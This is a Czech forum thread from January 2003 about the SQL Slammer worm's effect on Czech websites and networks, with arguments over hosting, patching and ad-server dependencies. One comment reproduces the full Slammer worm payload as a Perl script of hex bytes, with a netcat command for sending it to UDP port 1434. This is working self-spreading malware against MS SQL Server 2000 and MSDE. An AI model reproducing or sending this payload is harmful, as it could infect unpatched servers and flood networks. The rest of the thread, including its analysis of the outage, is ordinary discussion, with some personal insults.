  1. děravé servery, které spustily zahlcení internetu

  2. segmenty sítě a servery, které se nedokázaly vzpamatovat ze zátěže způsobené prvním bodem

  3. servery, které nejely, protože byly nějak závislé na funkčnosti 2.

bohužel server Živě spadá do trojky a adrenaline do dvojky. Pro nezúčastněného pozorovatele to vypadá stejně, jen je to asi třeba rozlišovat.

Souhlasím  |  Nesouhlasím  |  Odpovědět
viscidhad  |  25. 01. 2003 21:30

OK, beriem. Surfujem z net klubu cez mikrovlnku. Skusim teda ten zoznam adries, ktore boli OK:

www.cdr.cz, www.seznam.cz, www.tvfreak.cz, www.zoznam.sk, www.sos.sk, www.google.com, www.yahoo.com, mail.yahoo.com, atd.. a z tych zmienenych vyhladavacov som si odskocil na odhadom 20-30 roznych stranok a vsetko islo uplne v pohode. Zrejme som mal teda stastie...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jerry (bez trojky)  |  25. 01. 2003 21:53

Jenom pro doplnění - Živě jelo opravdu celý den, průběžně jsem ho kontroloval, ovšem musel jsem to dělat z Opery s vypnutým JavaScriptem a Flashem (totéž např. DigiWeb), IE se očividně nechytal. I když u toho jsem ty věci vypnout nezkoušel, přece jen u Opery se to ovládá pohodlněji, i když jinak používám spíš IE nebo Mozillu.

Taky si myslím, že by už někdo s tím systémem měl něco udělat, pokud je zobrazení stránky závislé na reklamních bannerech, je to docela prasárna.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jerry (bez trojky)  |  25. 01. 2003 21:54

Ale teď vám to zase chvíli hlásilo nedostupný SQL server...

Souhlasím  |  Nesouhlasím  |  Odpovědět
nobody  |  27. 01. 2003 22:22

Tak tedy proc vasi admini nepatchovali uz minuly rok? Ci je to teda chyba MS nebo VAsich adminu?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Roman Krejča  |  25. 01. 2003 21:45

Stačí přemýšlet hlavou! Ono totiž www.zive.cz/text jelo bez problemu cely den ;)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Neni dulezite  |  25. 01. 2003 21:57

Protoze Zive, Mobilmania, Doupe...proste cela rodinka fy Computer Press, a.s. chodi tak, jako by ten zminovany cerv (na ktery se momentalne vymlouvaji) uradoval minimalne obden!  (I ted se mi podarilo rozjet formular na prispevek az na podruhy,  poprve nejcastejsi obraz tohoto webu - SQL error apod. hruzy)...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jiri  |  25. 01. 2003 20:33

Pane Holcik, nez zase budete psat ty Vase bludy, tak se poradne informujte. Chyba v SQL 2000 byla ohlasena v kvetnu, nikoliv v cervenci. V cervenci byla vydana zaplata.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 20:56

změnil jsem uvedenou na opravenou.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ferda Mravenec  |  25. 01. 2003 20:30

<table border=1 width=1000><tr><td>Ted si zkusim vzhled stranky</td></tr></table>

Souhlasím  |  Nesouhlasím  |  Odpovědět
Brouk Pytlík  |  25. 01. 2003 20:38

Ošklivý Ferdo, co sedí u PC85 v Opavě že ty nám chceš tady prznit diskuze, ať na tebe nepošlu Berušku!

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ferda Mravenec  |  25. 01. 2003 20:15

Chci si testnout editor.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Raper  |  25. 01. 2003 19:36

Nevite, jestli je tato chyba i v MS SQL serveru 7?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 19:39

POdle popisu je to SQL 2000 a MSDE. SQL 7.0 funkčnost která zavedla tuhle chybu nemá, takže by tam neměla být. Jinak není až tak velký problém si to vyzkoušet. V http://www.pooh.cz/a.asp?id=2002788&db= je odkaz na místo kde jsou zdrojáky a analýzy toho červa.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 19:54

ten odkaz je i t v této bleskovce ;)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:29

Ten odkaz, o kterém mluvím já, je uplně jiný odkaz. Eyey byli dnes jedni z posledních kdo něco zveřejnili :)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 20:32

nejde o název, jde o obsah :) i eeye má analýzy a zdrojáky.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:39

Eye ale třeba nemá toto:

#!/usr/bin/perl
###############

my $packet =
"\x04\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\x01\x01\x01\x01\x01\x01\x01".
"\x01\xdc\xc9\xb0\x42\xeb\x0e\x01".
"\x01\x01\x01\x01\x01\x01\x70\xae".
"\x42\x01\x70\xae\x42\x90\x90\x90".
"\x90\x90\x90\x90\x90\x68\xdc\xc9".
"\xb0\x42\xb8\x01\x01\x01\x01\x31".
"\xc9\xb1\x18\x50\xe2\xfd\x35\x01".
"\x01\x01\x05\x50\x89\xe5\x51\x68".
"\x2e\x64\x6c\x6c\x68\x65\x6c\x33".
"\x32\x68\x6b\x65\x72\x6e\x51\x68".
"\x6f\x75\x6e\x74\x68\x69\x63\x6b".
"\x43\x68\x47\x65\x74\x54\x66\xb9".
"\x6c\x6c\x51\x68\x33\x32\x2e\x64".
"\x68\x77\x73\x32\x5f\x66\xb9\x65".
"\x74\x51\x68\x73\x6f\x63\x6b\x66".
"\xb9\x74\x6f\x51\x68\x73\x65\x6e".
"\x64\xbe\x18\x10\xae\x42\x8d\x45".
"\xd4\x50\xff\x16\x50\x8d\x45\xe0".
"\x50\x8d\x45\xf0\x50\xff\x16\x50".
"\xbe\x10\x10\xae\x42\x8b\x1e\x8b".
"\x03\x3d\x55\x8b\xec\x51\x74\x05".
"\xbe\x1c\x10\xae\x42\xff\x16\xff".
"\xd0\x31\xc9\x51\x51\x50\x81\xf1".
"\x03\x01\x04\x9b\x81\xf1\x01\x01".
"\x01\x01\x51\x8d\x45\xcc\x50\x8b".
"\x45\xc0\x50\xff\x16\x6a\x11\x6a".
"\x02\x6a\x02\xff\xd0\x50\x8d\x45".
"\xc4\x50\x8b\x45\xc0\x50\xff\x16".
"\x89\xc6\x09\xdb\x81\xf3\x3c\x61".
"\xd9\xff\x8b\x45\xb4\x8d\x0c\x40".
"\x8d\x14\x88\xc1\xe2\x04\x01\xc2".
"\xc1\xe2\x08\x29\xc2\x8d\x04\x90".
"\x01\xd8\x89\x45\xb4\x6a\x10\x8d".
"\x45\xb0\x50\x31\xc9\x51\x66\x81".
"\xf1\x78\x01\x51\x8d\x45\x03\x50".
"\x8b\x45\xac\x50\xff\xd6\xeb\xca";

print $packet;

# for testing in CLOSED network environments:
# perl worm.pl | nc server 1434 -u -v -v -v

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 21:22

No vidíš a teď je to i tady

Souhlasím  |  Nesouhlasím  |  Odpovědět
M  |  26. 01. 2003 02:46

se poser

Souhlasím  |  Nesouhlasím  |  Odpovědět
Smot  |  25. 01. 2003 19:19

Jestli by to nechtelo jinej sql server s mene dirama.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 19:32

Špatný předpoklad, chtělo by to jiného SQL admina, který nemá díry v hlavě a nekašle na svojí práci. Jiné SQL servery jsou stejně tak děravé a uplně stejně je potřeba je pravidelně opravovat.

http://www.pooh.cz/security/ 

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jirka Strnad  |  26. 01. 2003 20:44

Díry do hlavy má každý člověk. Já pět. Pane Dočekale, vy nemáte žádnou? Vy jste nikdy neudělal chybu? Jak můžete s takovou bohorovností odsuzovat práci jiných, do které vůbec nevidíte, vůbec netušíte, co se kde děje, které servery jedou a které nejedou, kde jsou jen přetížené? Jste nejchytřejší člověk na světě, který všechno ví, všude byl a nikdy neudělal chybu?

Souhlasím  |  Nesouhlasím  |  Odpovědět
M  |  27. 01. 2003 11:44

Daniel Dočekal chyby nedělá, to jen ty firmy mu pod rukama neprávem samy umírají a z jiných ho zase nespravedlivě vyhazují. Ale jinak je to fajn člověk.

Souhlasím  |  Nesouhlasím  |  Odpovědět
nobody  |  27. 01. 2003 22:19

HLAVENKA - DOCEKAL=JEDEN VELKY DOMYSLIVY EGOISTA!

JESTE ZE UZ VSICHNI JDETE TO STAREHO ZELEZA!! 

Tak co hlavenko a doco kolik vasich projektu stalo za neco? 1?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Idiot  |  27. 01. 2003 22:46

Heled Smote vis co pises? nejses nahodou soustruznik ? Domnivam se ze asi nejsi z oboru(nepocitam scriptera z php )?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 19:12

Zapomíná na to, že přestal kompletně jet Adrenaline, pravě také proto že ho napadl SQL Slapper (Sapphire). A že tedy Computer Press má neuvěřitelné máslo na hlavě :(

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 19:57

Pokud vím, tak zhučel Contactel, kde Adrenaline běží, Živě běží u GTS a běželo mimo reklamy. (admini jsou stejní a stejné je i patchování)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:33

Pokud vím neběžel adrenaline. Díky tomu že neběl adrenaline, nebylo možné získat obsah Živě - absence dodávky kódu od Andrenaline znamená nemožnost natáhnout stránky. EConomia OnLine kvůli tomu musela vypnout zcela reklamu (kterou také dodává normálně Adrenaline).

To že Adrenaline zjevně používá velmi špatné kódy, které vedou k likvidaci stránky v okamžiku kdy nedokáže dodat obsah, je sice předmět do zcela jiné diskuse, ale doufám že to bude pro Adrenaline konečně poučením, aby s tím něco udělali.

O tom že by nefungoval Contactel nic nevím, protože v době kdy adrenaline od ranních hodin až do 19:00 neběželo jsem na Contactel normálně několikrát vstoupil a rozhodně nevypadal že by "zhučel".

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:36

A ještě jeden dodatek. Pokud tedy "zhučel" contactel a nikoliv adrenaline, zajímalo by mě vysvětlení, proč ještě teď nejede NewLinx .....

  1   <10 ms   <10 ms   <10 ms  SERVER [192.168.10.1]
  2   500 ms   641 ms   500 ms  194.213.201.161
  3   172 ms   406 ms   531 ms  pointgw.core.ethernet.cz [194.213.201.1]
  4   750 ms   735 ms   703 ms  gwa-bb5.gts.cz [62.168.24.1]
  5  1344 ms  1672 ms   828 ms  nix1.ctt.cz [194.50.100.220]
  6   735 ms   671 ms   938 ms  prah01-r01-ge9-0-0-81.ctt.cz [194.212.211.173]
  7   765 ms   672 ms   688 ms  106.192.65.212.contactel.net [212.65.192.106]
  8   594 ms   781 ms   672 ms  prah01-r08-fe0-0-6.ctt.cz [194.108.60.8]
  9     *        *        *     Request timed out.

Zatímco Adrenaline, na témže místě u CTT jede.... (tedy až od cca. 19:00)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Michal  |  25. 01. 2003 21:06

Běž si honit jinam, nikoho tvoje kecy nezajímaj

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Mach  |  26. 01. 2003 20:02

Mluv za sebe, me to zajima.<br><br>
Ja nevim jstli adrenaline jel nebo ne, kazdopadne kvuli nemu tuhlo zive. Takze jsem do /etc/hosts pridal radek

127.0.0.1 ad.adrenaline.cz

A zive jelo jako z praku. Uz nikdy vic reklamu od adrenaline .

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Hasl  |  27. 01. 2003 22:14

Domnivam se ze to je proto, ze Contactel narozdil od GTS nema dostatek schopnych adminu aby rozpozali jaka ip byla napadena a radeji vypnou celou serverovnu nez aby zapblokovli udp na sql portu..
Mame na GTSku nekolik serveru tam jsme problem nemeli ale contactel nam vypl celou serverovnu a kdybychom vecer nezavolali co se deje tak nam ani nedaji vedet.. a nechaji to vyhnit az do pondelka!!!
Prisli jsme za tech nekolik hodin "lezerniho" chovani contactelu o prokazatelnych 500,- KC ale co s tim kdyz je to chyba naseho admina, ktery mel patchovat uz minuly rok? Radeji ted pretahujeme servery na GTSko..

Doufam ze Cpress si priste rozmysli hostovani u tak nespolehlive firmy !!

Petr Hasl

 

Souhlasím  |  Nesouhlasím  |  Odpovědět
frank  |  26. 01. 2003 20:36

Dočekale, běž do hajzlu, zvládneš-li to. Na tvoje navážení do jiných nikdo není zvědavý. Máslo na hlavě máš ty, protože jsi na Internetu posral každý projekt, který jsi vedl, neunavně to zkoušíš znovu a neúnavně to opět posíráš. Hrobečků, dluhů a průserů máš za sebou víc než kdokoli jiný - od Codalanu, přes pohádání s Neffem, přes průšvih v MIA až po tvůj vyhazov i s pracovním stolem v Telecomu. Dělej si svůj pů cz, ten aspoň nikdo nečte a nikdo se ti do něj neplete, a nemíchej se do života a práce jiných.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Milan Kvasnica  |  25. 01. 2003 18:52

Dnesni den ukazal, jaci profesionalove pracuji u computer press.

Ignorovat bezpecnostni balik 6 mesicu .

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 20:30

problém bohužel je, i když máte správně záplatovaný server a zhučí vám všecho okolo. Byly zahlceny linky internetu, ne jen spadlé individuální servery. Bohužel byl Adrenaline na segmentu, který šel do kytek.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:41

A proto, ptám se znovu, doteď nejede NewLinX?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Broža  |  25. 01. 2003 20:50

Ani Andrenaline, ani New Linx nepatří pod správu redakce; váš dotaz proto prosím směřujte na administrátory společnosti CP Online.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Daniel Dočekal  |  25. 01. 2003 20:57

ano, ano, třikrát ano. Jeden by ale předpokádal, že NOVINÁŘE (míněno Tomáše Holčíka), bude zajímat proč něco nejede, když on tvrdí že to vlastně jede (a jelo), ačkoliv to nejelo.

Chápu, musí bránit svého chlebodárce. Ale v takovém případě je lepší se nesnažit ho bránit za každou cenu a zdržet se komentáře.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Broža  |  25. 01. 2003 21:10

Já bych zase předpokládal, že novinář získává informace od zdroje, což v tomto případě určitě není Tomáš Holčík.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  25. 01. 2003 21:03

od našich adminů: Servery byly zapatchovány, problémy byly s extrémní zátěží, bohužel newLinx nejede (nerozchodil to) a jedou kvůli tomu kluci zítra ráno do Prahy, z Brna se ho nedaří rozchodit.

Prioritně byl rozcházen Adrenalin, dostal prioritu i před firmou (připojenou v Brně do Contactelu), nedostanu se tak třeba do mailu či do intranetu. (teď jedu z domu přes GPRS)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Souček  |  25. 01. 2003 22:08

Můžete trochu upřesnit, co vlatně zhučelo? Contactel má do Brna 2 linky 28 Mbit/s, ty se snad nezahltily?
Nějak si neumím představit, co by se muselo stát, aby síť, tj. linky a routery, přestala fungovat - podle mě se při zahlcení velkým provozem při DOS pouze zvýší RTT jak se naplní buffery, a pakety navíc se zahazují - tedy se zvýší packet loss. Až provoz poklesne, vše zase funguje jako předtím.
Žádným DOS se nemůže nic poškodit, ani software, ani hardware, proč to tedy nefungovalo a nefunguje?

A odkud byl vůbec generován ten traffic, to někde v Brně v síti Contactelu byly nějaké děravé servery způsobující tento DOS?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Cerny Ivan  |  25. 01. 2003 23:50

Asi by jste se divil, jak tluste "draty" to zacpalo. Co je 2x 28 Mbit/s proti na 100% ucpane lince CESNETu do globalniho internetu ( ma cca 1Gbit/s ), viz. http://www.cesnet.cz/provoz/zatizeni/. Dnes jsem kvuli tomu bohuzel vstaval uz v osm.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Souček  |  26. 01. 2003 00:27

To by mě taky zajímalo, proč právě tato linka byla tak zatížená. Když se podívám na http://schema.mistral.cz/ tak vidím, že na mezinárodních i NIX linkách UPC k žádnému viditelnému zvýšení provozu nedošlo. Rovněž statistika NIXu registruje pouze zvýšený provoz ze sítě Casablancy a do sítě Inway. Nejsou tam všichni provideři, takže si nejde udělat celkový obrázek, ale na http://www.nix.cz/graf/nix-sum.html není žádný nárůst provozu vidět.

Díval jsem se na disasemblovaného červa, ale nepoznám z toho, jestli nějaké IP adresy jsou více pravděpodobné než jiné jinak by příchozí provoz do každé sítě měl odpovídat počtu IP adres, které routuje.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Cerny Ivan  |  26. 01. 2003 00:48

Podle mne je důvodem preventivní předimenzovanost vnitrostátních linek CESNETu. Celé to začalo kolem 6:30, tou dobou je nárůst i na lince Praha-Plzeň a Praha-Ústí n.L., které mají obě 2,5Gbit/s - u CESNETu jsou zkrátka koncoví "zákazníci" (tj. školy) připojeni gigabitovýma linkama, takže stačí jeden nezazáplatovaný a linka ven z republiky (oficiálně má 622Mbit/s ) je ucpaná. U běžného providera má solventní zákazník 2 až 10Mbit/s, průměrně možná 1Mbit/s, takže jich musí být třeba 56 nezazáplatovaných a bez firewalu, aby ucpali linku 2x 28Mbit/s.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Root  |  26. 01. 2003 10:49

Doporucuji take shlednout statistiky SIXu, je tam jasne videt, ze SANET routuje zahranicni traffic (v rozporu s pravidly SIXu, ale co by se s nimi namahali, kdyz oni ten uzel spravuji) pres GTS - tam to narostlo az na 440 Mbps...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Švec  |  26. 01. 2003 16:10

To je jednoduché... Červ generuje v podstatě nekonečné zatížení - tedy zahltí takovou linku jakou má k dispozici. Na mistrálu má každý (kromě skoro nepoužívaných tarifů a kámošů adminů) na uploadu 96kbps. Navíc málokdo má u sebe nainstalovaný MSSQL (většinou se totiž jedná o domácí uživatele). Z toho celkově vyplývá že v síti UPC bloudí červ pouze na vstupu a takového provozu nemůže být zrovna mnoho (relativně).

Naopak napadené servery které jsou na páteři jsou docela průser. Každý z nich je schopen generovat desítky až stovky mbps. V principu čím silnější síť a čím je na ní více serverů tak tím je na tom hůř. "Domácí" síť typu Mistrál je celkem v pohodě.

Jakýkoliv napadený server generuje takové zatížení že jakákoli další komunikace s ním je v podstatě vyloučená. To odpovídá i tomu proč se CP nemůže dostat ke svým hostovaným serverům a musí kvůli tomu vypravit auto.

Souhlasím  |  Nesouhlasím  |  Odpovědět
mexiko  |  26. 01. 2003 19:28

pokud jsem stihnul postrehnout, tak tento problem se tyka i "odlecene verze" MS-SQL, tzv MS-DE. A ta je dosti pouzivana - napriklad u I-net bankovnictvi - M-BEST od Komercky.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Švec  |  26. 01. 2003 20:09

To je sice pravda, ale přizneje si že ani to není standardní vybavení většiny domácích uživatelů. A i ti co MSDE nebo MSSQL nainstalovaný mají tak od nich červík tlačí 96kbps útoků a ne víc. To jim sice totálně zahltí jejich připojení k netu (a to takovým způsobem že si nikam ani nepingnou), ale na celkové zahlcení mistrálu to má nepatrný vliv.

V Mistrálu by muselo být napadeno hodně přes 1000 počítačů aby se naplnila kapacita kterou UPC má k dispozici a kterou směrem "ven" prakticky nepoužívá.

To jeden napadený server umístěný na páteři generuje cca 1000 krát větší provoz (prostě posílá útoky rychlostí síťovky - 100mbps).

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jiří Hlaváč  |  25. 01. 2003 21:43

A pak je šikovné používat textovou verzi zive, stejne jako mobilmanie, ktere jely celkem spolehlive, zatimco plne graficke verze mely s nactenim na pretizenych linkach znacne problemy. :o)

Souhlasím  |  Nesouhlasím  |  Odpovědět
Root  |  26. 01. 2003 10:46

Pane Holciku, lzete. Vase servery byly tim, co zahltilo segmenty , ne servery okolo... A na to mam pochopitelne i dukazy.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Thomas  |  25. 01. 2003 17:16

No to je teda darda!  JÁ MYSLEL , ŽE MÁM ŠPATNEJ MODEM

Souhlasím  |  Nesouhlasím  |  Odpovědět
XxX  |  25. 01. 2003 22:39

<font face="Symbol">

Souhlasím  |  Nesouhlasím  |  Odpovědět
jouda  |  26. 01. 2003 12:02

no to jsme dva   ja myslel ze se mi taky neco pokakalo zvlast kdyz tu mam mam windoze a ne linux. nastesti ve zpravach na jednicce o tom mluvili takze mi bylo jasny kera bije.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Borek  |  26. 01. 2003 19:33

Jen nevím proč to živě nevydalo jako článek a proč tomu dalo tak netradičněn laděný titulek. Navrhoval bych spíše něco jako:

Servery Computer Pressu v ohrožení

nebo dokonce

Computer Press v ohrožení

Když bulvár tak pokaždé  a nejen kdy se to hodí

Souhlasím  |  Nesouhlasím  |  Odpovědět
stanis  |  27. 01. 2003 20:26

Ty si asi fakt hovado, co? Mozna kdyz si prectes celou diskusi, tak pochopis ze za to CP az zas tolik moc nemohl... Takze zklidni horon...

Souhlasím  |  Nesouhlasím  |  Odpovědět
Borek  |  27. 01. 2003 22:21

Hovado nejsem a používám stejnou taktiku pro titulky jako oni. Proč je to někdy dobře  aněkdy špatně?

Souhlasím  |  Nesouhlasím  |  Odpovědět
stanis  |  27. 01. 2003 23:48

Ale jo, musim uznat ze mas titulky fakt moc pekny, jen tak dal

Souhlasím  |  Nesouhlasím  |  Odpovědět
Zasílat názory e-mailem: Zasílat názory Můj názor